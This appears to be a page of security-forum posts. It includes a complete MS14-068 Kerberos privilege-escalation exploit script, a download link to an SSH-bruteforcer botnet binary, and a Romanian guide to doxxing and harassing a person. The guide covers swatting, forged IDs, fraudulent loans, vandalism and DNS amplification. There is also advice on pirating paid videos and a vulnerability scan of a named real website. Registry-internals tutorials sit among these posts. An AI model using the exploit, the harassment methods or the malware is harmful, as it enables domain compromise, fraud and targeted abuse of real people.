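    if (!accepts_fixed(len)) return NULL;   /* too long: original function path */
    wcsncpy(buf, str, len);                 /* g_pfnwcsncpy */
    buf[len] = L'\0';                       /* the explicit NUL that _wcsrev needs */
    wcsrev_inplace(buf);                    /* g_pfnwcsrev */
    return buf;
}

/* Drives the boundary case: a string of exactly 0x800 characters is accepted by
 * the "ja" check but rejected by the corrected one. */
int exact_capacity_is_rejected(void) {
    static wchar_t big[MAX_LEN + 1];        /* constructed input, all 'a' */
    for (size_t i = 0; i < MAX_LEN; i++) big[i] = L'a';
    big[MAX_LEN] = L'\0';
    return accepts_as_written(MAX_LEN) && !accepts_fixed(MAX_LEN)
        && reverse_for_exttextout(big, -1) == NULL;
}

int main(void) {
    printf("len 0x7ff: terminator stored at ebp%+ld (inside the buffer)\n",
           terminator_offset_from_ebp(0x7ff));
    printf("len 0x800: terminator stored at ebp%+ld (saved ebp); 'ja' check accepts it: %d\n",
           terminator_offset_from_ebp(0x800), accepts_as_written(0x800));
    printf("%ls -> %ls\n", L"Calculator", reverse_for_exttextout(L"Calculator", -1));
    return 0;
}
```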
-
The second time, hit Cancel on the videos you already have, so it won't waste time on the ones you already have. By the way, it happens to stop downloading at some point and a screen shows up asking whether you want to "Unlock", meaning buy them. Block that thing with adblock and after that it doesn't get stuck there anymore. As the author said: "it would be good to keep the extension to yourselves and not upload it to the net, because then the method would be lost" @FarSe Can't you make something similar for amazon, to download the books from there for free? Or at least for scribd... but there are a lot more books on amazon.
1 point
-
#!/usr/bin/python
# MS14-068 Exploit
# Author
# ------
# Sylvain Monne
# Contact : sylvain dot monne at solucom dot fr
# http://twitter.com/bidord
import sys, os
from random import getrandbits
from time import time, localtime, strftime

from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
from kek.crypto import generate_subkey, ntlm_hash, RC4_HMAC, HMAC_MD5
from kek.krb5 import build_as_req, build_tgs_req, send_req, recv_rep, \
    decrypt_as_rep, decrypt_tgs_rep, decrypt_ticket_enc_part, iter_authorization_data, \
    AD_WIN2K_PAC
from kek.pac import build_pac, pretty_print_pac
from kek.util import epoch2gt, gt2epoch


def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service,
           target_host, output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None):
    sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a)
    sys.stderr.flush()
    nonce = getrandbits(31)
    current_time = time()
    as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False)
    sys.stderr.write(' Done!\n')

    sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a)
    sys.stderr.flush()
    sock = send_req(as_req, kdc_a)
    sys.stderr.write(' Done!\n')

    sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    data = recv_rep(sock)
    sys.stderr.write(' Done!\n')

    sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
    session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue']))
    logon_time = gt2epoch(str(as_rep_enc['authtime']))
    tgt_a = as_rep['ticket']
    sys.stderr.write(' Done!\n')

    if krbtgt_a_key is not None:
        # typo in the posted copy ("sys.sdterr") corrected
        print >> sys.stderr, as_rep.prettyPrint()
        print >> sys.stderr, as_rep_enc.prettyPrint()
        ticket_debug(tgt_a, krbtgt_a_key)

    sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a)
    sys.stderr.flush()
    subkey = generate_subkey()
    nonce = getrandbits(31)
    current_time = time()
    pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time))
    tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name, tgt_a,
                            session_key, subkey, nonce, current_time, pac, pac_request=False)
    sys.stderr.write(' Done!\n')

    sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a)
    sys.stderr.flush()
    sock = send_req(tgs_req, kdc_a)
    sys.stderr.write(' Done!\n')

    sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    data = recv_rep(sock)
    sys.stderr.write(' Done!\n')

    sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a)
    tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey)
    session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue']))
    tgt_b = tgs_rep['ticket']
    sys.stderr.write(' Done!\n')

    if trust_ab_key is not None:
        pretty_print_pac(pac[1])
        print >> sys.stderr, tgs_rep.prettyPrint()
        print >> sys.stderr, tgs_rep_enc.prettyPrint()
        ticket_debug(tgt_b, trust_ab_key)

    if target_service is not None and target_host is not None and kdc_b is not None:
        # the forum rendering dropped the "b)" of every "kdc_b)" below; restored
        sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_b)
        sys.stderr.flush()
        subkey = generate_subkey()
        nonce = getrandbits(31)
        current_time = time()
        tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name,
                                 tgt_b, session_key2, subkey, nonce, current_time)
        sys.stderr.write(' Done!\n')

        sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_b)
        sys.stderr.flush()
        sock = send_req(tgs_req2, kdc_b)
        sys.stderr.write(' Done!\n')

        sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_b)
        sys.stderr.flush()
        data = recv_rep(sock)
        sys.stderr.write(' Done!\n')

        sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_b)
        tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey)
        sys.stderr.write(' Done!\n')
    else:
        tgs_rep2 = tgs_rep
        tgs_rep_enc2 = tgs_rep_enc

    sys.stderr.write(' [+] Creating ccache file %r...' % output_filename)
    cc = CCache((user_realm, user_name))
    tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2)
    cc.add_credential(tgs_cred)
    cc.save(output_filename)
    sys.stderr.write(' Done!\n')

    if target_key is not None:
        print >> sys.stderr, tgs_rep2.prettyPrint()
        print >> sys.stderr, tgs_rep_enc2.prettyPrint()
        ticket_debug(tgs_rep2['ticket'], target_key)


# Pretty print full ticket content
# Only possible in a lab environment when you already know krbtgt and/or service keys
def ticket_debug(ticket, key):
    try:
        ticket_enc = decrypt_ticket_enc_part(ticket, key)
        print >> sys.stderr, ticket.prettyPrint()
        for ad in iter_authorization_data(ticket_enc['authorization-data']):
            print >> sys.stderr, 'AUTHORIZATION-DATA (type: %d):' % ad['ad-type']
            if ad['ad-type'] == AD_WIN2K_PAC:
                pretty_print_pac(str(ad['ad-data']))
            else:
                print >> sys.stderr, str(ad['ad-data']).encode('hex')
    except Exception as e:
        print 'ERROR:', e


if __name__ == '__main__':
    from getopt import getopt
    from getpass import getpass

    def usage_and_exit():
        print >> sys.stderr, 'USAGE:'
        print >> sys.stderr, '%s -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>' % sys.argv[0]
        print >> sys.stderr, ''
        print >> sys.stderr, 'OPTIONS:'
        print >> sys.stderr, ' -p <clearPassword>'
        print >> sys.stderr, ' --rc4 <ntlmHash>'
        sys.exit(1)

    opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4='])
    opts = dict(opts)
    if not all(k in opts for k in ('-u', '-s', '-d')):
        usage_and_exit()
    user_name, user_realm = opts['-u'].split('@', 1)
    user_sid = opts['-s']
    kdc_a = opts['-d']
    if '--rc4' in opts:
        user_key = (RC4_HMAC, opts['--rc4'].decode('hex'))
        assert len(user_key[1]) == 16
    elif '-p' in opts:
        user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest())
    else:
        user_key = (RC4_HMAC, ntlm_hash(getpass('Password: ')).digest())

    target_realm = user_realm
    target_service = target_host = kdc_b = None
    filename = 'TGT_%s@%s.ccache' % (user_name, user_realm)

    user_realm = user_realm.upper()
    target_realm = target_realm.upper()

    sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm,
           target_service, target_host, filename)

Source
1 point
-
Don't post every shitty site in Show-Off. You used wpscan, but you weren't even able to read what it said. It clearly says that the Contact Form 7 version is 4.0.2 (i.e. the latest version), and below it says that 3.5.3 is vulnerable, so it's nothing. And last but not least, you're a shitty person for scanning the site of an RST member, regardless of what that member did / who he is.
1 point
-
Boss, what are you doing, coming to Show-Off with the results of a scanner?
1 point
-
I hope I haven't posted in the wrong section and that this is useful (to those of you who want to do some reversing). It's an SSH bruteforcer from what I could tell; it connects to a C&C (I think it isn't an IRCD). Unfortunately, at the time of testing, the connection to the C&C times out. The same binary for several processors - x32, x64, arm, mips, ..... Link: https://www.sendspace.com/file/54jyoj
1 point
-
Exploring the Windows Registry Part 1

The Registry is a key component of the Windows operating system, and it's always been recommended that you should never carelessly run Registry Cleaners or start to change or delete keys whose purpose you do not fully understand. You never seem to find much information about the Registry in general, unless it's in specialist blogs or computer science papers. In this blog post I hope to show how to explore the Registry using WinDbg and look at some of the internal workings.

The Registry tends to be referred to less commonly as the Configuration Manager, and the Configuration Manager is the technical name for it. As the name suggests, the Configuration Manager mainly maintains the state of the configuration data for the operating system and any programs which may have been installed.

The Registry is divided into several sections called Rootkeys. The Rootkeys are defined as follows:

HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIG
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_PERFORMANCE_DATA
HKEY_USERS

Each Rootkey has a number of Hives which are subdivided into Keys and Values. This can be seen when viewing the Registry with the Registry Editor.

Configuration Data), COMPONENTS, HARDWARE, SAM, SECURITY, SOFTWARE and SYSTEM. Any changes here will apply to the entire system.

The HKEY_CURRENT_CONFIG contains information relating to Hardware Profiles, which enables configuration of driver settings. A Hardware Profile may change from boot to boot, and will be used by any programs which require it.

The HKEY_CLASSES_ROOT contains information for file extension associations, COM class registration and UAC (User Account Control).

The HKEY_CURRENT_USER contains the configuration data regarding the locally logged on user. The Root Key is mapped to the Ntuser.dat file which is present on the hard drive. Some of the local configuration data examples include: Environment Variables, Network Settings, Software Settings and Session Information.

The HKEY_USERS contains data required for each loaded user profile, and will be used by Winlogon to implement any specific user changes. This section will also contain keys relating to user security identifiers for that profile.

The HKEY_PERFORMANCE_DATA contains operating system and server performance counters, and will not be visible through the Registry Editor. These performance counters are only available through the Windows Registry API.

The HKEY is used to represent a handle to the rootkey.

Now that we have looked at the general logical structure of the Windows Registry, we will need to examine its actual implementation on the hard disk. This is achieved through the concept of Hives, Cells and Bins. It is possible to examine parts of the Registry in physical memory.

The structure of a Configuration Manager Hive can be seen with WinDbg using the _CMHIVE data structure. It's a large data structure, and therefore I have omitted some of the fields.

The above data structure contains a larger sub structure called _HHIVE, which contains some very useful information. The _CMHIVE structure is allocated from paged pool, and has the pool tag of CM10. You can view this pool allocation information with !pooltag and !poolfind.

Using the !poolfind extension with the pooltag and specifying the pool type as paged pool with the 1 switch, we can see all the pool allocations for that specific pool tag.

A Hive is simply the on-disk representation of the Registry; each one of these has its own registry tree which serves as a root. The Hives, which can be found under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist, are then loaded. These Hives are stored on the hard disk, and are then linked to the Registry file paths as seen below. Most of the hives reside in the System32 folder, whereas the others will reside in the UserProfiles and Users folders. Alternatively, we can view the Hivelist within WinDbg using the !reg hivelist extension.

You may have noticed that the HARDWARE hive does not have a folder path; this is because it is updated every time the computer is booted, and therefore is only present within memory.

We can even view the current paged pool consumption of the Registry Hives using the !reg dumppool extension. Again I've had to omit some information due to the size limitations.

Using Process Explorer, and then selecting the System process, we can view the Hive Handles which are currently opened by the System Process.

Going back to the general structure of how Hives are organized, Hives are linked together within a doubly linked list. The head of this linked list can be found with WinDbg; the address is 8336e44c on x86, I'm not sure if there is any difference on x64. We can also see this with the _CMHIVE structure and the HiveList field. The addresses within the linked list are all virtual addresses.

In the second part I will be taking a closer look at the structure of Hives and some more forensic analysis techniques.

Source : BSODTutorials: Exploring the Windows Registry Part 1

Exploring the Windows Registry Part 2

Each Hive is divided into a number of allocation units called Blocks; the first block of a Hive is called the Base Block. The information which is stored within a Hive is then organized into Cells which contain active registry data such as keys, values, security descriptors and subkeys. The Hive Blocks are allocated in 4096 byte allocation sizes, and are called Hive Bins. The Base Block may also be referred to as the Registry Header, with the other blocks being called Hive Bins. Each Hive Bin is then divided further into Cells as explained above.

A Hive Bin will have the hbin signature which can be found with WinDbg. Firstly, use the !reg hivelist extension, and then use the !reg viewlist extension with a desired Hive Address. The !reg viewlist extension will list the Mapped Views for the selected Hive.

I wasn't able to find a dump file which had any mapped views, therefore I won't be able to show you the steps completely. Once you have used the !reg viewlist extension, then use the db command with a desired view to view the contents of a bin.

The _HHIVE data structure seems to contain a Signature field and a BaseBlock field as described earlier. Each Hive Bin contains a pointer to the next Hive Bin and the first Hive Bin. We can find free Hive Bins with the !reg freebins extension and the Hive address.

These Hive Bins are only really containers for Cells which hold registry information such as keys, security descriptors, subkey lists and key values. There are a few different types of Cells:

Key Cell
Value Cell
Subkey-list Cell
Value-list Cell
Security-Descriptor Cell

The Key Cell contains the registry key and may be called the Key Node. A Key Cell will contain the kn signature for Keys and kl for Link Nodes. Furthermore, the Key Cell will maintain timestamp information about the latest update to that key, and various Cell Indexes which will describe additional information.

The Value Cell contains information about the key's value, and will have a Cell Index into the cell which contains such data about the key. The signature will be kv.

The Subkey-List Cell contains a list of Cell Indexes for Key Cells which all share a common Parent Key. The Value-List Cell is the same as above, but applies to Value Cells rather than Key Cells.

The Security Descriptor Cell will contain the ks signature and a reference count which maintains a count of the number of Key Nodes or Key Cells which share the Security Descriptor. This cell will contain a Security Descriptor.

We can view Cell data structures with _CM_CELL_DATA and then use the -r switch to dump all the hidden sub data structures. The -r switch is really useful for data structures in general, especially since Microsoft won't document some sub fields fully.

Since we are on the topic of keys, I thought it would be appropriate to look at the concept of Keys and how we can investigate Keys further with WinDbg. We can firstly use the !reg openkeys extension, and then view any open keys. Please note that I've limited the output of the extension to one Hive.

However, we can gather more interesting information by looking into a few data structures. Each key will have a Key Control Block (KCB); we can use the _CM_KEY_CONTROL_BLOCK data structure to view the information about the open key. This is similar to the information which can be found with the !reg kcb extension; you will need to use the !reg findkcb extension with the full registry path in order to find the KCB address. However, in the open keys case, you can simply use the !reg kcb extension since the KCB address is already given.

The Configuration Manager maintains open keys within a table for fast name lookups; the table can be found with two global variables called CmpCacheTable and CmpHashTableSize. The CmpCacheTable is a pointer to a hash table, which explains the _CM_KEY_HASH data structure within the KCB. Each entry within the table is a pointer to the _CM_KEY_HASH data structure. The NextHash field points to the next structure within the table.

Source: link

Exploring the Windows Registry Part 3

Cells are containers for information, such as keys, hence the different types of cells explained in the last post. In order to make the logical structure of the registry clearer, it's important for me to state how all the different parts I've been discussing fit together to form one complete picture of the Windows Registry. Hives are split into Bins, and the Bins are then split into Cells. An empty Bin will not contain any cells, whereas a Bin with Cells will obviously contain Cells which will contain registry data. This brings around the point about Cell Indexes and Cell Mappings, and some of the data structures we can explore with WinDbg.

Cell Indexes are essentially pointers which link cells from different hives together, to make it easier and more efficient for the Configuration Manager to load the information which it is searching for. More specifically, the Cell Index is an offset into the cell with the subtraction of the size of the base block for the selected hive.

The tables which the Cell Indexes are used to index into can be found within the Storage.Map member of the _DUAL data structure of the appropriate _HHIVE data structure. We can expand the _DUAL data structure and examine this member.

The _HMAP_DIRECTORY is an array of pointers to table entries, which then contain the information for a specific Block and Bin. The FreeDisplay field is used for free cells within memory.

Since Hives are allocated from Paged Pool, they will need to be mapped, since paged pool isn't guaranteed to be contiguous. This leads to the concept of Cell Index Mapping, which is very much the same as Virtual Address Translation on x86 systems; remember that x64 had an additional table of directory pointers.

Using the diagram above, it may become more apparent what the pointers within the mentioned data structures are being used to index into. As we can see, the Directory Index pointer is being used to point to the Hive Cell Map Directory, which is then used to point to the Cell Map Table with a Table Index pointer, and then the Byte Offset is used to point to the specific Cell within the Hive Block. There is an additional bit which is either 0 or 1, and is used to determine if the Hive is Volatile or Stable, and which table type to begin searching with. This translation is used for Hives in memory. 1 is Volatile and 0 is Stable.

Directory Index = 10 bits
Table Index = 9 bits
Byte Offset = 12 bits

Since Hives usually reside on the hard disk and are then mapped into memory, in order to avoid excessive consumption of the Cache Manager's address space the number of mapped views for a hive is limited to 256 views. The LRU (Least Recently Used) views list is consulted when this limit has been reached and a new mapping is required because the Configuration Manager requires a hive to be mapped into memory. The LRU mapping will be removed from the list. This data structure is allocated from Paged Pool.

There are some interesting WinDbg extensions we can use to find additional information related to Cell Indexes, such as the !reg cellindex extension. The extension shows the virtual address associated with the Cell Index. The first address is the Hive Address and the 40 is the offset which we are looking for. I've used the SYSTEM hive in this example.

Source: link
1 point
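As an added example (not from the BSODTutorials posts quoted above), here is the cell index split described there, 1 type bit, 10-bit directory index, 9-bit table index and 12-bit byte offset, together with the on-disk side of the same idea: a stable cell index plus the 4096-byte base block gives a file offset, which a forensic parser should validate by walking the hbin chain rather than trusting the arithmetic alone. The hive image is a constructed two-block sample, and the 32-byte hbin header layout and 8-byte cell alignment are assumptions of this example, not something the posts state.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Cell index layout as given in the post: 1 type bit (1 = volatile, 0 = stable),
 * 10-bit directory index, 9-bit table index, 12-bit byte offset. */
typedef struct { unsigned volatile_hive, directory, table, offset; } cell_index_fields;

cell_index_fields decode_cell_index(uint32_t ci) {
    cell_index_fields f;
    f.volatile_hive = (ci >> 31) & 0x1;
    f.directory     = (ci >> 21) & 0x3ff;
    f.table         = (ci >> 12) & 0x1ff;
    f.offset        =  ci        & 0xfff;
    return f;
}

#define BASE_BLOCK_SIZE 0x1000u   /* the base block the post subtracts from a file offset */
#define HBIN_SIZE       0x1000u   /* 4096-byte bin allocation unit */
#define HBIN_HDR_SIZE   0x20u     /* assumed header: "hbin", offset, size, padding */

typedef struct {
    int ok;                  /* 0 when the index does not name a cell in a valid bin */
    uint32_t file_offset;    /* cell index + base block size */
    uint32_t bin_offset;     /* file offset of the hbin that contains the cell */
    int allocated;           /* negative size word => cell in use; positive => free */
    uint32_t size;           /* |size word|, bytes including the size word itself */
    const uint8_t *data;     /* first byte after the size word */
} cell_ref;

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Resolve a stable cell index against a hive file image, validating the bin
 * chain on the way instead of trusting the offset arithmetic alone. */
cell_ref resolve_stable_cell(const uint8_t *hive, size_t hive_len, uint32_t ci) {
    cell_ref r = {0};
    if (ci >> 31) return r;                 /* volatile cells exist only in memory */
    if (ci & 7) return r;                   /* assumed: cells are 8-byte aligned */
    if (hive_len < BASE_BLOCK_SIZE || memcmp(hive, "regf", 4) != 0) return r;
    r.file_offset = ci + BASE_BLOCK_SIZE;
    uint32_t bin = BASE_BLOCK_SIZE;
    while (bin + HBIN_HDR_SIZE <= hive_len) {   /* walk the bins from the first one */
        if (memcmp(hive + bin, "hbin", 4) != 0) return r;
        uint32_t bin_size = rd32(hive + bin + 8);
        if (bin_size < HBIN_SIZE || bin_size % HBIN_SIZE || bin + bin_size > hive_len) return r;
        if (rd32(hive + bin + 4) != bin - BASE_BLOCK_SIZE) return r;  /* offset from first bin */
        if (r.file_offset >= bin + HBIN_HDR_SIZE && r.file_offset + 4 <= bin + bin_size) {
            int32_t sz = (int32_t)rd32(hive + r.file_offset);
            r.bin_offset = bin;
            r.allocated = sz < 0;
            r.size = (uint32_t)(sz < 0 ? -sz : sz);
            if (r.size < 8 || (r.size & 7) || r.file_offset + r.size > bin + bin_size) return r;
            r.data = hive + r.file_offset + 4;
            r.ok = 1;
            return r;
        }
        bin += bin_size;
    }
    return r;
}

/* Constructed sample image (not a real hive): base block plus one bin holding one
 * allocated 16-byte cell at file offset 0x1020 and one free cell after it. */
const uint8_t *sample_hive(size_t *len) {
    static uint8_t img[BASE_BLOCK_SIZE + HBIN_SIZE];
    memset(img, 0, sizeof img);
    memcpy(img, "regf", 4);
    uint8_t *bin = img + BASE_BLOCK_SIZE;
    memcpy(bin, "hbin", 4);
    wr32(bin + 4, 0);                                 /* this bin's offset from the first bin */
    wr32(bin + 8, HBIN_SIZE);                         /* bin size */
    uint8_t *cell = bin + HBIN_HDR_SIZE;
    wr32(cell, (uint32_t)-16);                        /* allocated: size word is negative */
    memcpy(cell + 4, "sample cell", 11);              /* constructed payload */
    wr32(cell + 16, HBIN_SIZE - HBIN_HDR_SIZE - 16);  /* rest of the bin: one free cell */
    *len = sizeof img;
    return img;
}

cell_ref lookup_sample(uint32_t ci) {
    size_t n;
    const uint8_t *h = sample_hive(&n);
    return resolve_stable_cell(h, n, ci);
}

int main(void) {
    cell_index_fields f = decode_cell_index(0x80000040u);
    printf("0x80000040: volatile=%u dir=%u table=%u offset=0x%x\n",
           f.volatile_hive, f.directory, f.table, f.offset);
    cell_ref c = lookup_sample(0x20);
    printf("cell index 0x20 -> file offset 0x%x, bin 0x%x, allocated=%d, size=%u, data=%.11s\n",
           c.file_offset, c.bin_offset, c.allocated, c.size, (const char *)c.data);
    return 0;
}
```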
-
Open a free tutorial and press play; if it keeps loading:
1. Delete the cookies
2. Restart the router
3. Restart the PC.
1 point
-
Putem lua pe rand fiecare informatie si ulterior sa gasim informatii noi pe baza acestora. 1. Numele complet In cazul in care este o persoana activa social sunt sanse foarte ridicate de a-i afla contul de Facebook. De aici exista mai multi vectori de atac: 1. Social engineering: creare unui cont aparent benign, crearea unei legaturi cu persoana respectiva, acumularea de informatii despre viata personala 2. Social forensics: folosirea de site-uri precum tineye.com pentru a gasi toate referintele care contin informatii privitoare imaginilor publice pe care le detine 3. Atacuri indirecte: atacarea membrilor de familie sau a colegilor de lucru a respectivei persoane 4. Atacuri de incriminare: apelarea la echipe de interventie speciale(SMURD, politie) folosind numele real al respectivei persoane. Este suficient sa stim orasul in care are domiciliul(cunoastem IP-ul) pentru a ne deplasa efectiv acolo sau prin apelare VoIP(de ex Skype) pentru a instiinta organele statului. 5. Profanare: in lumea neo-liberala in care traim ne putem folosi de curente politice pentru a ne indeplini telul: orice mesaje incorecte d.p.d.v. politic(rasism, sexism, xenofobie) pot angrena corpuri mediatice care la randul lor vor ruina viata respectivei persoane, cel putin din punct de vedere profesional. Actiunile acestea pot include jignirea unui grup de minoritati, desenarea unor simboluri naztionaliste(nu vrem sa fie indexata pagina) pe locurile de odihna a celora cu origini semitice, etc. 6. Asocieri nedorite: deschiderea a numeroase conturi folosind respectivul nume pe diverse site-uri pentru adulti(imaginea persoanei respective va avea de suferit cand paginile pe care apare vor fi indexate). 7. Comportament anti social: prezentarea unui individ ca fiind persoana in cauza si afisarea unui comportament neconstructiv(furt, injurii, deranjarea ordinii publice, etc.). 8. Amenintarea unor membrii din lumea interlopa(nu recomand acest lucru incepatorilor) sub numele respectiv. 
Este usor sa pornesti o discutie iar ulterior sa o deviezi intr-o directie care poate deranja interlocutorul(amenintari, intimidare, santaj). Dupa un timp acestia vor lua masuri ... 9. Atacuri psihologice: este relativ usor sa gasim un numar de telefon pornind de la un nume complet(pe vremuri aveam Pagini Aurii). Putem ulterior ameninta persoana respectiva prin dialog-uri neadecvate(injurii, cuvinte obscene, amenintari) la ore tarzii(intre 03:00 si 05:00 dimineata mai ales in zilele lucratoare) folosind cartele prepaid. 10. Atacuri la imaginea personala: crearea unor blog-uri cu continut pentru adulti folosind respectivul nume. 2. Cod numeric personal * Toate cele de mai sus la care se adauga: 1. Presupunand ca avem si numele real putem crea un buletin fals. Putem crea tensiuni in comunitate vandalism, deranj public. Vom furniza respectivul buletin o data ce autoritatile au luat masuri(optiunea cercetat in libertate este preferata in zilele noastre). 2. Putem incerca parole pe diverse site-uri sociale folosind subsiruri ale CNP-ului. Daca avem noroc putem strica imaginea respectivei persoane foarte usor: cerem cate 2$ pe paypal tuturor contactelor. In cazul in care nu primim banii putem recurge la injurii si amenintari. Astfel de manifestari mai mult ca sigur vor deteriora relatiile celui/celeia in cauza. 3. Serie si numar buletin * Toate cele de mai sus si: 1. Putem "lua credit doar cu buletinul". Sincer nu stiu daca mai ofera vreo banca acest "beneficiu" insa se pot crea pagube semnificative in cazul in care este posibil. Doar numele, prenumele si CNP-ul sunt informatiile relevante de pe buletine cel putin la noi. Daca persoana nu returneaza valoarea imprumutata plus dobanda exista sanse destul de ridicate ca toate conturile bancare sa ii fie inchise/inghetate. Mai mult nu mai poate deschide altele noi. 2. Crearea mai multor buletine identice si distribuirea acestora intr-o comunitate de rromi care doresc sa emigreze 4. 
Adresa de acasa Considerand ca avem la dispozitie si datele de mai sus putem face urmatoarele: 1. Comandarea a nenumarate produse folosind teleshopping. Cu multa vreme in urma in fiecare sambata si duminica la orele diminietii se difuzau astfel de emisiuni. Ideea este sa comanzi cat mai multe produse(nu conteaza natura acestora) Este de dorit totusi ca acestea sa fie voluminoase(scaune, mobilier(pat, canapea, coltar, fotolii), electrocasnice(frigidere, masini de spalat, etc.) pentru a determina un cost cat mai ridicat al transportului. 2. Tactici de intimidare: deranjarea la ore indecente 3. Amenintarea unor grupuri interlope(din nou, nu recomand acest lucru incepatorilor) si dupa un timp furnizarea adresei catre acestea. 4. Atentionarea institutiilor statului: apeluri la politie la ore tarzii. Astfel, s-ar putea trezi cu mascatii la usa la 03:00 dimineata. 5. Scoaterea casei la vanzare; crearea unor documente false care sa ateste faptul ca domiciliul apartine atacatorului. Prezentarea acesteia la o ora/data la care proprietarul nu este acasa(este foarte probabil sa fie necesar un lacatus in acest punct). 6. Avertizari din partea primariei(am facut o astfel de pozna cand eram copil): lipirea unui document care sa para oficial si care sa solicite platirea unei amenzi pana la o anumita data. Optional atacatorul poate plimba victima prin oras, la institutiile statului mai exact. Un scenariu ar putea fi urmatorul: reinnoirea actelor de proprietate conform unei noi legi care tocmai a intrat in vigoare(presupune cateva drumuri la primarie, prefectura), contactarea furnizorului de gaz pentru a solicita o verificare a sistemului de incalzire(presupune cel putin un drum plus costuri aferente), platirea unor amenzi pentru deranj public, conditii insalubre, etc.. S-ar putea deschide chiar si un ghiseu intr-o cladire inchiriata, si astfel sa se adune bani(sigur se gaseste cineva care sa plateasca). 7. 
Crearea unei dispute cu vecinii: crearea unor pagube si lasarea numelui adevarat pe proprietatea acestora si invers(numele vecinilor sunt relativ usor de aflat). Mai mult ca sigur se vor crea tensiuni in special daca acestea sunt deja prezente insa intr-o forma mai blanda. 8. Aceasta este cam triviala insa merita mentionata: sudarea usii de la intrare(stati putin si ganditi-va la starea pe care a-ti avea-o daca vi s-ar intampla acest lucru intr-o zi lucratoare). 9. In cazul in care victima pleaca in concediu, sa zicem pentru doua saptamani, iar domiciliul ramane vacant se pot deschide toate robinetele si se pot porni toate aparetele electrocasnice. Se pot inchide inainte ca proprietarii sa se intoarca. 5. Adresa de mail 1. Scrierea acesteia pe un numar de site-uri publice(vor fi prinse de crawler-e devenind mai mult ca sigur destinatii pentru spam) 2. Abonarea la diverse newsletter-uri(extrem de enervant intrucat nu sunt recunoscute ca si spam) 3. Un cont de e-mail este usor de compromis o data ce suficiente date personale sunt cunoscute atacatorului 6. Adresa IP 1. Se pot face DNS amplification attacks cu IP-ul respectiv ca si sursa. Spre deosebire de flood acesta/clasa acestuia va fi blacklisted de unele companii de hosting 2. Port scan, flood. 3. Putem determina si orele la care persoana este activa, cand merge la lucru, cat timp sta la lucru, etc.. 7. Cont IBAN 1. Daca avem toate informatiile de mai sus putem inchide contul 2. Putem transfera bani intr-alt cont 8. Cont Paypal 1. Se poate bloca dupa mai multe tranzactii cu sume mari(putem lua credit doar cu buletinul).1 point
-
I've managed to catch up on the posts too, but I got a bit stuck on juncture.ro from @siur. Personally, in your place, I would do an update and check htaccess + file permissions.
[+] URL: http://juncture.ro/
[+] robots.txt available under: 'http://juncture.ro/robots.txt'
[!] The WordPress 'http://juncture.ro/readme.html' file exists
[!] Full Path Disclosure (FPD) in: 'http://juncture.ro/wp-includes/rss-functions.php'
[+] Interesting header: SERVER: Apache/2.4.10 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
[+] XML-RPC Interface available under: http://juncture.ro/xmlrpc.php
[+] WordPress version 4.0.1 identified from meta generator
[+] WordPress theme in use: figero - v1.5.3
[+] Name: figero - v1.5.3
 | Location: http://juncture.ro/wp-content/themes/figero/
 | Readme: http://juncture.ro/wp-content/themes/figero/readme.txt
 | Changelog: http://juncture.ro/wp-content/themes/figero/changelog.txt
 | Style URL: http://juncture.ro/wp-content/themes/figero/style.css
 | Theme Name: Figero
 | Theme URI: http://www.inkthemes.com/figero-wordpress-org/
 | Description: Figero is a great Theme to build your business or services related website with ease. The Theme c...
 | Author: InkThemes.com
 | Author URI: http://www.inkthemes.com/
[+] Enumerating plugins from passive detection ...
 | 2 plugins found:
[+] Name: contact-form-7 - v4.0.2
 | Location: http://juncture.ro/wp-content/plugins/contact-form-7/
 | Readme: http://juncture.ro/wp-content/plugins/contact-form-7/readme.txt
[!] Directory listing is enabled: http://juncture.ro/wp-content/plugins/contact-form-7/
[!] Title: Contact Form 7 & Old WP Versions - Crafted File Extension Upload Remote Code Execution
    Reference: http://packetstormsecurity.com/files/125018/
    Reference: http://seclists.org/fulldisclosure/2014/Feb/0
    Reference: http://osvdb.org/102776
[+] Name: w3-total-cache - v0.9.4
 | Location: http://juncture.ro/wp-content/plugins/w3-total-cache/
